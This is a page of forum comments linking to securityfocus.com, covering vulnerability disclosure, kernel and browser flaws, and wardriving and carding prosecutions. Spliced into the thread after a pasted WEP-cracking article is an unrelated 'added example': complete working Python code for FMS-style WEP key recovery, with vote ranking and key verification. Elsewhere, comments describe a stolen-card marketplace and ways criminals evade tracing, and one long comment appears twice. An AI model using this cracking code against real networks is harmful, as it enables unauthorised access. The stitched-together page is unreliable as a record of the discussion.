Domain: securityfocus.com
Stories and comments across the archive that link to securityfocus.com.
Comments · 2,651
-
He's wrong, PLEASE READ
What if someone discovers a security bug, and they are really responsible professional researchers, and they want to give all affected vendors some time to come up with an official solution? (researchers, not ppl into 0day exploits or cracking or whatever)
The way to do this is to have a multiple vendor coordinated release, where all agree on a date to release all together the alert and fix. This usually takes a few days, as most of them need to go through QA and other processes, as they are responsible to their customers.
SecurityFocus offers such a service for FREE to any researcher/vendor.
Blowing the whistle too early:
Even with that, there is always some a**hole or some idiot vendor breaking this blanket period. See how RH fsckd up this, many times, and got themselves up to the point of being told late. Some other linux groups also did this, by "mentioning" the bug to uncontrolled developers who went fixing on their own, thus blowing the whistle.
IF LINUS & CO LEAVE THIS COORDINATED SCHEMA, THEY'LL LOCK THEMSELVES OUT NOTIFICATIONS FROM RESPECTED RESEARCHERS.
NOTE1: I have nothing against the 0day or the cracking communities, I'm only stating IF a researcher wants to give a blanket to vendors. (a very common case)
NOTE2: I'm not affiliated with SF, and even HATE the split bugtraq times for special vendors (i think this really killed it, a VV BAD move)
NOTE3: you might not agree with this schema, but consider most top name security firms follow it and it is to protect the users.
NOTE4: there is a defined period, so vendors are urged to come up with patch/alert
NOTE5: think also for the poor devs working for those vendors, making them work overnight hurried is not polite, they are devs like all of us
(I'm sure I missed some note and I'll get flamed anyway... flame on grrrrr) -
Re:A Darker Shade of Grey Hat
When you find a bug like this, you should first and foremost submit it to the party responsible for the maintenance of the code. You should at least give the responsible party the opportunity to review/respond/repair before making vulnerabilities public knowledge.
Security exploits are a serious matter, and they need to be handled properly. Throwing this kind of thing out in the open willy-nilly is, at best, irresponsible.
You state that as fact, yet full disclosure is probably the most widely accepted way of dealing with exploits--and the most widely advocated by security experts.
It's at the very least a matter that's open to a lot of debate.
http://www.securityfocus.com/news/238 -
Impressive Resume
http://www.securityfocus.com/archive/77/216516
Applications: Microsoft Visual Studio, Microsoft Office Suite, Paint Shop Pro,
Corel Suite, Maya 2.5, FrontPage, Dreamweaver, Ultraweaver, Homesite, TopStyle,
Adobe (various), AutoCAD, AutoDesk Inventor, Filemaker Pro, Borland Programming
Suite, Flash, Poser, Internet Space Builder, Retina, Nscan, Nmap, Visual Route,
PGP, SATAN, SANTA, SAINT, L0phtcrack, Crack/John the Ripper/Derivatives, Iris, Notepad,
Ultra Edit, SoftIce, among others.
I better get working on my notepad skills if I need a job. -
Re:How very nice of T-Mobile to not let us know
I disagree - if they (The Feds) were involved with other cases, which were exposed by this guy, they may have been waiting until they could shore up their defenses before allowing this to hit the news.
Once it's out there in the mainstream media, the world knows, and once the world knows, any international crime cases involved with the leaked information would have to be solid as a rock.
From the Article http://www.securityfocus.com/news/10271
"He'd obtained a log of an IRC chat session in which a hacker named "Myth" copy-and-pasted excerpts of an internal Secret Service memorandum report, and a Mutual Legal Assistance Treaty from the Russian Federation. Both documents are described in the Secret Service affidavit as "highly sensitive information pertaining to ongoing USSS criminal cases.""
Looking at this from the perspective of someone who was working inside the USSS cases, can you imagine what they had to contend with? There is more here than just some kid cracking a system for a few SSN's and cute pictures. -
Meet the script kiddie.
This really makes you wonder about the guys you never hear about, the ones that don't get caught. :-/
I agree, the most disturbing thing about all of this is the low level of knowledge of the hacker. He was nothing but a script kiddie on his resume and he was caught with obvious mistakes. We can be sure that TMobile and others are still owned by more sophisticated crackers who will not be caught.
The article links to a 2001 resume which never mentions GNU and only once mentions Unix but lots of Windozed based cracker toys and garbage. His efforts, while many, were too narrowly focused.
It does not look like he mastered Windoze cracking or much else by the time he was caught three years later. Besides being dumb enough to try to sell information, he accepted a proxy from a stranger. Someone who knew what they were doing would have a botnet proxy they set up themselves that could never be traced through. What else is windoze cracking good for?
The whole mindset was script kiddie. Own a phone service and collect stuff. What a waste of time.
He got his resume wish in a perverse way. He wanted a job in computer security. Now he's a felon and gets to spend some quality time as a government slave, snitching on his friends till he's all used up. Or he can go to jail and take the usual felon jobs: dishwasher, garbage man and other highly undesirable manual labor in tiny shops that know they can abuse you. Those jobs will be waiting for him when the government is through with him.
-
Re:His Resume is posted online !
He's even posted to SecurityFocus' job postings back in 2001. Resume is as shown above, but sent via a Hotmail address.
Amazing. -
Doesn't ring right to me.
Honeypot Proxy
By August 5th the agents already had a good idea what was going on, when Ethics made a fateful mistake. The hacker asked the Secret Service informant for a proxy server -- a host that would pass through Web connections, making them harder to trace. The informant was happy to oblige. The proxy he provided, of course, was a Secret Service machine specially configured for monitoring, and agents watched as the hacker surfed to "My T-Mobile," and entered a username and password belonging to Peter Cavicchia, a Secret Service cyber crime agent in New York.
Something doesn't quite ring right about this, apart from the obvious entrapment of the proxy. If his penetration of the T-Mobile system was as comprehensive as suggested, then why would the cracker access the system via the public "My T-Mobile"? It simply doesn't make sense unless he's simply picked it up as a lone username/password, and been socially engineered into using it.
The 'Hacker' also made little or no serious attempt to cover his tracks; his IRC handle can be readily linked to his name, physical & email addresses and CV here, as disclosed by the article.
The Mutual Legal Assistance Treaty with the Russian Federation is apparently publicly available.
My guess is that Myth is really a handle for Peter Cavicchia, the ShadowCrew is and always has been a secret service entrapment operation for script kiddies and wannabes. -
Even Hung Out On UnderNet?
So... let's say that I want to patronize his obviously grossly illegal service. How do you consummate a transaction like this? Cash in a Fedex envelope? Sent to whom? A P.O. box?
Who performs first? Are there criminal escrow services?
This page, linked in the posted article, has some explanation about how they traded:
"The 4,000 Shadowcrew members were participants in an underground economy capable of providing a dizzying array of illicit products and services. The most active commodities were "dumps" of credit card account data, fake physical cards to go with the dumps ($50 blank, $70 embossed, in bulk), and expertly forged identification to help pass the plastic at the local consumer electronics store. Credit reports, hacked online bank accounts, and names, birthdates and social security numbers of potential identity theft targets were also for sale in bulk.
Each product had its own specialists, and every vendor had to be reviewed by a trusted site member before they were allowed to sell. Disputes were handled judiciously, "rippers" selling bunk products quickly exposed and banned from the site. In one case a vendor who owed another member money was allowed to continue selling only on the condition that his future illicit earnings would be garnished until his debt was repaid..
Members of the community even traded in tangible items like ATM skimmers, prescription drugs, and cocaine, and services like DDoS for hire and malware customization. One well-reviewed vendor offered a test-taking service that promised to get customers technical certifications within days. He was permitted to vend after earning the reviewer a Microsoft MCP certification under an alias."
And how stupid do you have to be to take out an ad online, in a known criminal hangout, announcing your secret power, and providing contact info?
Um, dude, have you ever hung out on undernet? All sorts of shady shit happens there. I've known friends who knew people from online chatrooms who hijacked business conference call lines and made them available to entire chatrooms as a group conference voicechat line. Warring chatrooms would even appear and try to make the line unusable. I thought it was moronic (they even called from their home and work phones for God's sake!), but I think people aren't used to the internet's topology. The lack of a physical police presence makes people pretty confident and reckless - you're not there, so they can't just arrest you on the spot, which eliminates most of the anxiety in any crime (smoke weed in a public park and your house and compare your reactions). Even worse, because of the nature of the internet, the police don't need a physical presence to monitor any of it, so criminals can't just look over and notice that shady van across the street. The lack of these real-world reminders makes for bad heuristic judgments. You'd think hackers would be the first to notice that their lack of fear is due to this sort of fallacy, but from the article, it's clear that some don't.
Don't get me wrong - I'm not saying that it's easy to catch people committing crimes online. It's extremely difficult. GHB kits thrived online, and I'm sure if you still looked you could find products ostensibly marketed for other reasons that are just clandestine GHB kits on google (that's the only example you get, but you'd all be fucking shocked if you knew just how many drugs are sold online with Visa and paypal). If you take only the most obvious precautions, it's many times harder. Something as simple as using a proxy and encryption from a "borrowed" wireless connection can make criminals almost undetectable. Many of us use one of the three regularly. How hard is it to combine them?
The police can't monitor everything. Even if they devoted the resources to looking for this sort of thing, how many people know the magic combinations of words and searching techniques that let them -
Re:Icon and Cursor files?
How? The same way those vaunted open-source developers managed to work widespread security flaws into TIFF images, PNG images, and even file names.
-
Sure, why not?
Seriously now. How the hell did they work that one in? Security flaws in Icon files.
Perhaps the same way as the widely-used and open source libpng library had a number of vulnerabilities last year? (ref 1, ref 2)
Or the same sort of way the Mozilla XBM vulnerability arose? (ref)
This isn't a new thing, and it's not unique to Microsoft, either.
-
RCE via Active-X, again
Microsoft Security Bulletin MS05-001 addresses the cross-domain vulnerability with their HTML Help Active-X control. Microsoft mentions that it's "newly" discovered, but see the proof-of-concept at Security Focus--posted into BugTraq almost a month ago.
Incidentally, if you're one of those rare Windows users running IE in restricted (ESC) mode, your vulnerability is mitigated... surprise, surprise. -
Patch coming 1/11/2005
http://www.securityfocus.com/bid/12186/discussion/ :
"Microsoft has released advanced notification that they will be releasing three security bulletins for Windows on January 11th, 2005. The vendor has not enumerated how many vulnerabilities will be addressed by these security bulletins, nor what specific components or platforms may be affected."
Microsoft itself has announced this as well: http://www.microsoft.com/technet/security/bulletin/advance.mspx. No explicit details have been posted, obviously to prevent script kiddies from taking advantage of the vulnerabilities.
If you're concerned about the time for these vulnerabilities to be addressed, remember that the SMB vulnerability in Linux was not patched for over three months. Patches take time, particularly when faced with a huge user base (something Linux developers need not worry about) and a huge existing software base (again, something Linux developers need not worry about). -
Aimed at the masses
To be fair to Microsoft, their software picked up things on my PC which I knew were "dubious", but I knew were safe (e.g. Kazaa Lite as opposed to Kazaa, etc).
It's obvious that this software is aimed towards the uninformed masses in the same way SP2. I'd wager that most non-techie people barely know what spyware is, let alone how to find spyware-free "lite" versions of software, assuming they exist.
Also, the real time agent kicks serious ass. I'm amazed that people have even tried to criticise that (simply because its MS) by saying "oh great, yet another TSR program to run in the background, way to go M$!". When I installed the latest Sun JVM it informed me that a Browser Helper Object was installed and that it was "safe". A nice touch.
In other news, how come there hasn't been a front page story on these serious flaws in Mozilla and Firefox? Double standards? I'm all for bashing MS when appropriate but lauding every single IE flaw with a separate story and ignoring something like this doesn't exactly paint the site as unbiased. -
Re:/me flips off isec.pl
From http://www.securityfocus.com/archive/1/386436:
first of all I must complain about the handling of this vulnerability that I reported to vendorsec. Obviously my code posted there has been stolen and plagiarized in order to put the blame on Stefan Esser from Ematters and disturb the security community. I really apologize to Stefan Esser for the inconvenience and thank him for his cool reaction - the plagiarism did work. Further steps must be taken to investigate the security leak on vendorsec.
-
Re:Unacceptable
Dude, Read, at least one linked article says that they are all fixed in the latest version.
Now it is actually still a problem with the download spoofing, but it is more of an annoyance. With the way the download manager parses urls, it is possible to misrepresent where something is being downloaded. If you can't trust the site then don't download. There will be "..." in the middle of the url for the file you are downloading so it is not like the url spoofs in IE. So you have a warning something may be fishy. -
Re:A fix?
-
EPIC = privacy threat
#9 is an oxymoron. How is exposing one's own private info going to protect ANYONE's privacy? Either people in EPIC are morons, or they are the biggest hypocrites working for telemarketers. What the Do-Not-Call Registry really does is tell telemarketers that these are actual marketing opportunities instead of some automated answering machines at the other side of the phone. As a result, telemarketers will call the suckers who sign up. And yes, the telemarketers will definitely get away with it, because they can just use caller I.D. spoofing services to shift blame, just like e-mail spammers have done for years.
-
my personal favorite
"In many cases the response is we need to stick with the version that's available at the time that we purchased that distribution, so for example if I'm running Apache 1.3 on my Red Hat Enterprise server, although I may want Apache 2.0 because it might have new features or it might have some new capabilities, I'm outside of my support model now with Red Hat."
Is this a bad thing? Does Microsoft do something different? Can I get IIS6 supported on Windows 2000? Can I get Apache2 supported on Windows 2000?
"... if you take a look at Intertrust, the company that filed suit against Microsoft for patent infringement, Microsoft wrote a check for $440 million and our customers did not have to do anything in their implementation of Microsoft technology nor feel the pain, let's just say, of that situation."
If I used Microsoft software (That's a pretty big IF), would anything be different for me if Microsoft DIDN'T pay off Intertrust? Does Microsoft really think that if I don't violate a patent, I can be sued because they did?
"Obviously, Microsoft is incredibly focused on security."
-
Re:Give it a Rest, Please!
Linux may be stable, virus-free, more secure by design
From http://www.securityfocus.com/bid/10662/discussion/ :
"It is reported that the Linux kernel version 2.6 contains a flaw which allows users to improperly change the group ownership on arbitrary files that they do not own. For the Linux kernel 2.4.X this issue is only exploitable when the kernel NFS server is active, for the 2.6.X kernel this issue is always exploitable.
An attacker may reportedly be able to exploit this issue to gain superuser privileges.
This issue was reported in version 2.6.6, but other versions, including 2.4.X, are also likely vulnerable." -
Re:Unpatched?
SP2 is vulnerable to the winhlp32.exe Heap Overflow Vulnerability, according to xfocus. Bugtraq posting. They don't know if LoadImage is vulnerable in SP2.
-
cut&paste complete article
I only got some ad for FREE microsoft security products (sewage odorizers?) here is the complete article
:)
WEP: Dead Again, Part 1 by Michael Ossmann last updated December 14, 2004
Introduction
This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.
Is WEP that bad?
Many security folks and even more wireless folks these days are saying that WEP isn't all that bad. They say that if you use modern equipment that filters weak Initial Vectors (IVs) and change your keys frequently (or at least once in a while), nobody will ever crack your WEP. Sure, maybe some next-generation WEP attacks will arise one day that will change everything, but WEP is okay today for all but the most sensitive networks. Well, that next-generation is already here, heralded by highly functional tools that make WEP look weaker than Barney Fife on guard duty, sleeping on the job.
Let's take a look at some of the new tools that should be in every penetration tester's bag of tricks, rather then delving into the details of why the various attacks work. Time and time again, the industry has shown that it will not reject broken security safeguards until attacks are actually demonstrated in the real world. Here's how to quickly turn some heads.
The way things were
Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think.
The first caveat to this old approach is that only encrypted packets count. As wireless access points transmit unencrypted beacons several times per second, it is easy to be fooled into believing that you have a larger number of useful packets than you really do. If you use Kismet for network discovery and sniffing, it breaks down the packet count for you, displaying the number of "Crypted" packets separately from the total number, as shown below:
Figure 1. Kismet in action.
The second thing working against your packet collection efforts is that only certain "interesting" or "weak" IVs are vulnerable to attack. Kismet also tells you how many of these have been gathered, although it may not use the same counting method as the various cracking tools. To make matters more difficult, wireless manufacturers responded to the FMS attack by filtering out the majority of weak IVs that their access points and wireless cards transmit. Unless your target network is using old equipment, chances are you'll have to collect no less than ten million encrypted packets to crack a WEP key using these older tools.
In early 2002, h1kari released a tool called dwepcrack (part of the bsd-airtools package) that improved upon the existing implementations of the FMS attack. Although dwepcrack did a good job of advancing the practical implementation of statistical WEP cryptanalysis, its improvements were only incremental.
Tools that changed everything
On August 8th, 2004, a hacker n
-
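The statistical attack the pasted article is talking about, as an added example that is not part of the article or of any of the tools it names (AirSnort, dwepcrack, the KoreK tools): a self-contained FMS-style recovery of a constructed 40-bit WEP key. It assumes the attacker gets the first keystream byte of each frame from the known LLC/SNAP header, builds its own "capture" from the classic weak IVs of the form (A+3, 255, X), ranks candidates by vote, and uses a small "fudge factor" search verified against a few frames' known keystream so that a byte which was only second or third in the vote is still found. The `filter_weak` switch models the vendor response the article describes: an access point that never transmits those IVs, against which this classic attack finds nothing. Key, IVs and all function names are this example's assumptions.

```python
"""FMS-style WEP key recovery on a constructed capture (added example, not
from the SecurityFocus article). Constructed 40-bit key, constructed IVs."""
from collections import Counter

# Every WEP data frame starts with the LLC/SNAP header, so its first 6
# keystream bytes are known plaintext: keystream = ciphertext XOR SNAP.
SNAP_HEADER = bytes.fromhex("aaaa03000000")


def rc4_ksa(key):
    """RC4 key scheduling: state S after all 256 steps."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n keystream bytes (WEP per-packet key = IV || secret)."""
    S, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def is_fms_weak_iv(iv, a):
    """Classic FMS weak IV for secret key byte a: (a+3, 255, X)."""
    return iv[0] == a + 3 and iv[1] == 0xFF


def fms_guess(iv, known_prefix, z):
    """Run the KSA only over the bytes the attacker knows (IV plus recovered
    prefix), apply the 'resolved' test, and derive a guess for the next secret
    byte from z, the first keystream byte. The guess is right ~5% of the time."""
    a = len(known_prefix)           # index of the secret byte under attack
    n = a + 3                       # its position in IV || secret
    k = list(iv) + list(known_prefix)
    S, j = list(range(256)), 0
    for i in range(n):
        j = (j + S[i] + k[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= n or (S[1] + S[S[1]]) & 0xFF != n:
        return None                 # not resolved: this IV leaks nothing here
    return (S.index(z) - j - S[n]) & 0xFF


def rank_candidates(capture, known_prefix):
    """Vote over every captured frame; most-voted values first."""
    votes = Counter()
    for iv, keystream in capture:
        g = fms_guess(iv, known_prefix, keystream[0])
        if g is not None:
            votes[g] += 1
    return [b for b, _ in votes.most_common()]


def recover_key(capture, key_len, fudge=5):
    """Depth-first search over the top-`fudge` candidates per byte; a full key
    is accepted only if it reproduces the known keystream head of a few frames."""
    check = capture[:3]

    def verify(key):
        return all(rc4_keystream(bytes(iv) + key, len(ks)) == ks for iv, ks in check)

    def dfs(prefix):
        if len(prefix) == key_len:
            return prefix if verify(prefix) else None
        for b in rank_candidates(capture, prefix)[:fudge]:
            found = dfs(prefix + bytes([b]))
            if found is not None:
                return found
        return None

    return dfs(b"")


def build_capture(secret, filter_weak=False):
    """Constructed traffic: three ordinary IVs plus every (a+3, 255, X) IV for
    each secret byte. filter_weak models an AP that skips FMS-weak IVs."""
    ivs = [(0x10, 0x20, 0x30), (0x55, 0x66, 0x77), (0x01, 0x02, 0x03)]
    for a in range(len(secret)):
        ivs += [(a + 3, 0xFF, x) for x in range(256)]
    capture = []
    for iv in ivs:
        if filter_weak and any(is_fms_weak_iv(iv, a) for a in range(len(secret))):
            continue
        ks = rc4_keystream(bytes(iv) + secret, len(SNAP_HEADER))
        ciphertext = bytes(p ^ k for p, k in zip(SNAP_HEADER, ks))
        # the attacker keeps only (IV, ciphertext XOR known SNAP header)
        capture.append((iv, bytes(c ^ p for c, p in zip(ciphertext, SNAP_HEADER))))
    return capture


if __name__ == "__main__":
    SECRET = bytes.fromhex("1f9a7c42d3")        # constructed 40-bit key
    print("recovered:", recover_key(build_capture(SECRET), 5))
    print("with weak IVs filtered:", recover_key(build_capture(SECRET, filter_weak=True), 5))
```

The ~5% per-IV hit rate in `fms_guess` is why the tools of 2001 needed millions of frames: only the "resolved" IVs vote at all, and most of those votes are noise, so the right byte only stands out once a few hundred weak IVs per key byte have been seen. A 104-bit key is the same loop with `key_len=13`, and an access point that filters the (A+3, 255, X) class leaves this classic attack with no votes, which is exactly the gap the KoreK-era attacks in the rest of the article close.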
Re:I'd love to see a breakdown of the damages
I get the security holes emailed to me every day and fix them on an ongoing basis. This is a normal course-of-business expense, and charging the expense to someone else is...well...just a little bit gray ethically. NASA should have been fixing their security holes rather than waiting for someone to come along and try to pass the expense off on.
I'm not at all saying the cracker was right to break into NASA's systems. What I am saying is NASA has a responsibility to keep its systems secure, and spend the required $$$ to do so, and they failed. That they failed does not give them the right to charge that expense to the next person to walk through the door.
-
Re:Huh? Bill needs clue..
Download and install Linux
But then you still need to get all the patches for the 60 security vulnerabilities in the kernel this year (look it up: http://www.securityfocus.com/bid). -
Re:No comment?
http://securityfocus.com/archive
You can't depend on Slashdot to keep you informed about security. For example, phpbbconfigdumper.c was published only hours after the actual PHP exploits were made public.
-
Re:Why are these things always announced on Friday
the first announcement was on wednesday by stefan esser on bugtraq and full-disclosure. additional info came up later on, PHP 4.3.10 changelist and the according changes in CVS can be seen by everyone since then.
i do not think that any serious system administraton team gets to know this vulnerabilities via slashdot for the first time, the problem is, that compilation of all dependencies and deployment to all systems is a hard job to do from wednesday night to a reasonable end just before weekend.... in a week where lots of companies have their *drinks all inclusive* xmas events and the usual pre-vacation problems occur. -
GNU WGet Multiple Remote Vulnerabilities
No, you're not safe. Check this out. It is recent too, released on Dec 10, 2004.
-
Old News...
This has been reported over a year ago. See the DOJ Press release...
DOJ Link for Salcedo here.
Also see the Security Focus article here.
There are plenty of articles about the case. The DOJ and FBI have most of it as public information for the search engine savvy. The key is, there is a lot of potential damage to end consumers and the company with crimes like this. Considering it was his second offense and he hadn't even gotten off probation for the first, 9 years seems reasonable to me.
I have been following this case online for a while. They were involved with the 2600 scene, attended "Hacker" conventions, and were already known for things that some might view on a grey line (IE telephone companies - See Telcodata.us). The thing is that occasionally there are bad apples that learn from others and commit crimes. Showing a 9 year prison sentence might help keep some of the apples from rotting. -
I knew the third guy
The 3rd guy, Adam Botbyl, used to live on the street behind mine. He's a couple years younger than me; my little brother knew him better than I did. (This article names him)
This was probably 10 years ago (him and my brother would have been in 5th or 6th grade), but one interesting bit of trivia is that he was the butt of jokes by the other kids. A bunch of the neighbor kids were into collecting basketball cards. Some of the crueler ones would put common cards back into the pack and glue the top together, and they'd sell or trade them to Adam.
As I heard about this through my brother, it was portrayed that Adam was hella gullible. One pack had a card from the wrong brand in it (e.g. a Topps card in an Upper Deck pack); the other kids told him that it must be some error and might be more valuable. Whether the kid actually believed it or just went along to avert more bullshit is a question for him.
Stories like this were pretty common, and I wonder what that does to a kid, having no good friends around.
Now, I'm not saying that's an excuse; he's a total stupidass for what he did.
-
Correction: I should have RTF-referenced-A...
I had read the SecurityFocus article (I never read the AP ones... because they are always sparse on details). I had thought it was the same linked article.
-
Try researching the story before posting it!
Who gets their news from a mickey mouse outfit like ABC anyway? If you're going to post some clueless banter about attempted credit card fraud, at least link to an article (or thread) with some relevant information about the case instead of an uninformed soundbite. You could start with one of the following:
http://reviews-zdnet.com.com/AnchorDesk/4520-7297_16-5511088.html
http://www.theregister.co.uk/2003/11/22/michigan_wifi_hackers_try/
http://www.securityfocus.com/news/7438
http://www.securityfocus.com/news/8835
http://www.netstumbler.org/showthread.php?t=11115
Some of the more interesting quotes for those too lazy to click on the links:
"In 2000, as a juvenile, Salcedo was one of the first to be charged under Michigan's state computer crime law, for allegedly hacking a local ISP."
"It was six months later - Botbyl allegedly admitted to agents - that Botbyl and his friend Salcedo hatched a plan to use the network to steal credit card numbers from the hardware chain"
"At some point in their wardriving experience, Timmins and Botbyl came upon a Lowe's hardware store with an open wireless network. Timmins later admitted to Kevin Poulsen of Security Focus that what he did next was technically illegal: he used the Lowe's network to check his e-mail. When he realized it was Lowe's private network, however, he says, he disconnected."
"That in itself might have been the end of the story. However, Lowe's became aware of the breach and contacted the FBI, who, after its investigation, charged Timmins with one count of unauthorized computer access. And that by itself would have been a significant story: Timmins's plea has been reported as the first instance of a wardriving conviction. I think the claim is an exaggeration, however. The charge would have been the same had he used a wired connection."
"But here's where the story gets interesting. Several months later, Botbyl returned to the Southfield, Michigan, Lowe's with a new friend, Brian Salcedo, now 21. Salcedo, it turned out, was in the final weeks of a three-year probation for an earlier computer crime."
"According to the indictment, the hackers used the wireless network to route through Lowe's corporate data center in North Carolina and connect to the local networks at stores around the country. At two of the stores - in Long Beach, California and Gainesville, Florida - they modified a proprietary piece of software called "tcpcredit" that Lowe's uses to process credit card transactions, building in a virtual wiretap that would store customer's credit card numbers where the hackers could retrieve them later."
"Brian Salcedo, 21, faces an unusually harsh 12 to 15 year prison term under federal sentencing guidelines, based largely on a stipulation that the potential losses in the scheme exceeded $2.5 million."
"As for how it was computed here's one probable way: Maximum number of cards in the system at the time they could have captured, multiplied times the maximum credit limit on each. (So say Lowe's does an average of 2500 credit cards transactions nationally in a night, and each has a $1000 Credit Limit. That is $2,500,000 right there.)"
"They were not able to access nationwide credit card files or get into corporate systems," says Lowe's spokesperson Gina Balaya. "They did access six credit card transactions from one store."
"My initial reaction when I heard the charges was one of skepticism," says Karl Mozurkewich, founder of the Michigan software company Utropicmedia, and a member of the group. "Eighty percent of the people in the 2600 group in Michigan are more the c -
Try researching the story before posting it!
Who gets their news from a mickey mouse outfit like ABC anyway? If you're going to post some clueless banter about attempted credit card fraud, at least link to an article (or thread) with some relevant information about the case instead of an uninformed soundbite. You could start with one of the following:
http://reviews-zdnet.com.com/AnchorDesk/4520-7297_16-5511088.html
http://www.theregister.co.uk/2003/11/22/michigan_wifi_hackers_try/
http://www.securityfocus.com/news/7438
http://www.securityfocus.com/news/8835
http://www.netstumbler.org/showthread.php?t=11115
Some of the more interesting quotes for those too lazy to click on the links:
"In 2000, as a juvenile, Salcedo was one of the first to be charged under Michigan's state computer crime law, for allegedly hacking a local ISP."
"It was six months later - Botbyl allegedly admitted to agents - that Botbyl and his friend Salcedo hatched a plan to use the network to steal credit card numbers from the hardware chain"
"At some point in their wardriving experience, Timmins and Botbyl came upon a Lowe's hardware store with an open wireless network. Timmins later admitted to Kevin Poulsen of Security Focus that what he did next was technically illegal: he used the Lowe's network to check his e-mail. When he realized it was Lowe's private network, however, he says, he disconnected."
"That in itself might have been the end of the story. However, Lowe's became aware of the breach and contacted the FBI, who, after its investigation, charged Timmins with one count of unauthorized computer access. And that by itself would have been a significant story: Timmins's plea has been reported as the first instance of a wardriving conviction. I think the claim is an exaggeration, however. The charge would have been the same had he used a wired connection."
"But here's where the story gets interesting. Several months later, Botbyl returned to the Southfield, Michigan, Lowe's with a new friend, Brian Salcedo, now 21. Salcedo, it turned out, was in the final weeks of a three-year probation for an earlier computer crime."
"According to the indictment, the hackers used the wireless network to route through Lowe's corporate data center in North Carolina and connect to the local networks at stores around the country. At two of the stores - in Long Beach, California and Gainesville, Florida - they modified a proprietary piece of software called "tcpcredit" that Lowe's uses to process credit card transactions, building in a virtual wiretap that would store customer's credit card numbers where the hackers could retrieve them later."
"Brian Salcedo, 21, faces an unusually harsh 12 to 15 year prison term under federal sentencing guidelines, based largely on a stipulation that the potential losses in the scheme exceeded $2.5 million."
"As for how it was computed here's one probable way: Maximum number of cards in the system at the time they could have captured, multiplied times the maximum credit limit on each. (So say Lowe's does an average of 2500 credit cards transactions nationally in a night, and each has a $1000 Credit Limit. That is $2,500,000 right there.)"
"They were not able to access nationwide credit card files or get into corporate systems," says Lowe's spokesperson Gina Balaya. "They did access six credit card transactions from one store."
"My initial reaction when I heard the charges was one of skepticism," says Karl Mozurkewich, founder of the Michigan software company Utropicmedia, and a member of the group. "Eighty percent of the people in the 2600 group in Michigan are more the c -
Re:Internet Ban
I think you may be referring to the Heckenkamp case where the hacker's lawyers were going to challenge the constitutionality of pre-trial restrictions. For example, here (Apparently he/they were challenging on the grounds of restriction of free speech. That sounds dubious to me
... after all he could easily write down what he wanted said on paper and get someone else to 'post' it.) Anyway, I could not find any material on the web that mentioned whether the challenge succeeded or not. Somehow I doubt it. Interestingly, the article linked above also mentions other cases of internet restrictions imposed by judges during sentencing.
-
Release Date
Hmmmm. I think not.
With credit for time served and good behavior, Salcedo will be eligible for release in the fall of 2011.
There is no federal parole. -
Plea agreement
Security Focus:
Even reduced, Salcedo's prison term is unusually harsh for a computer crime. The sentence is based largely on a stipulation in Salcedo's plea agreement with prosecutors that the losses in the abortive caper would have exceeded $2.5 million. "The damage that Mr. Salcedo could have caused the consumers if he was successful could have been astounding," says prosecutor Martens.
If I were that attorney, I wouldn't be returning phone calls, either.
Salcedo's defense attorney, Samuel Winthrop, did not return phone calls. -
Re:Kernel is not the problem
Linux Kernel is solid.
No, it's not: http://www.securityfocus.com/bid/11864/.
-
SecurityFocus doesn't agree
http://www.securityfocus.com/bid/11864/info/, along with the 59 other Linux Kernel security vulnerabilities reported this year, seems to indicate otherwise. Check out http://www.securityfocus.com/ and choose Linux as the vendor.
-
Did you know?
Minor Threat along with Mucho Maas authored ToneLoc, a great war dialer. Hours upon hours I sat, watched, and listened while it scanned. Great Stuff..
-
Re:Personally, I'd prefer to see stability in Fire
Somebody already did that. IE passed, no other browser did. Although I think the firefox people got working on the bugs it showed up pretty quickly, and the only reason IE passed was because MS has recently incorporated this testing into their standard setup.
-
Re:About time
Note that the "Some not" article link (where the author describes vulnerabilities that have not been patched for IE) describes the popup injection attack as being IE-specific, even though both http://www.securityfocus.com/bid and http://www.secunia.com/ have reported this vulnerability for *all* browsers. This blatant misrepresentation of facts decreases the credibility of the author significantly.
-
HTML isn't as safe as you think...
Actually, just last month, Michal Zalewski ran a trivial HTML monkey attack against most of the browsers out there. IE didn't have any problem with it, but he found many probably exploitable issues with all of the others.
Which doesn't change the fact that needless javascript is bad. It is. -
A 'thank you' from the SF forensics moderator...
The security focus mailing list dedicated to forensics is also good lurking
I am the moderator of the SecurityFocus.com forensics list, and agree that it is a great resource. (Al Huger is listed in the info page as the moderator; he is actually the list owner.) The list is dedicated to discussion of technical forensics topics.
The SF forensics list archives are here. A general listing of SF mailing list archives is here. Those interested in subscribing to the forensics list (or other lists @SecurityFocus) can do so from the archive page.
Cheers!
Scott C. Zimmerman, CISSP -
AV take
SecurityFocus has a recent column about where AV companies stand on spyware.
Most interesting is the clear market distinction that is being drawn between spyware and virus. We've seen the technical argument about how they cannot be categorized the same, but I figured that these markets would have fully merged by now.
-
Re:A rose by any other name...
That's not what the term DDoS means. It means you make the service unavailable by inundating the server (or a critical intermediate point) with requests[...] Your stretched definition is not only wrong, but is also a blatant attempt to change the meaning of a term for expediency.
No, you are the one who is wrong. What you describe is a network-based* denial of service attack. There are other types, too. Just because network-based attacks are the most common today, doesn't mean the meaning of DoS has changed. Read any advisory on bugs that makes Apache crash for good, and you'll find the term DoS in a context you just excluded. And the other D just means that the attack is staged from a multitude of computers (and usually implies that it would be hard to do from only one). One definition I found was:
"An attack on a computer system intended to reduce, or entirely block, the level of service that 'legitimate clients' can receive from that system."
And SecurityFocus describes it as
"The term can be applied to any situation where an attacker attempts to prevent the use or delivery of a valued resource to its intended audience or customer. It can be implemented via multiple methods, physically and digitally."
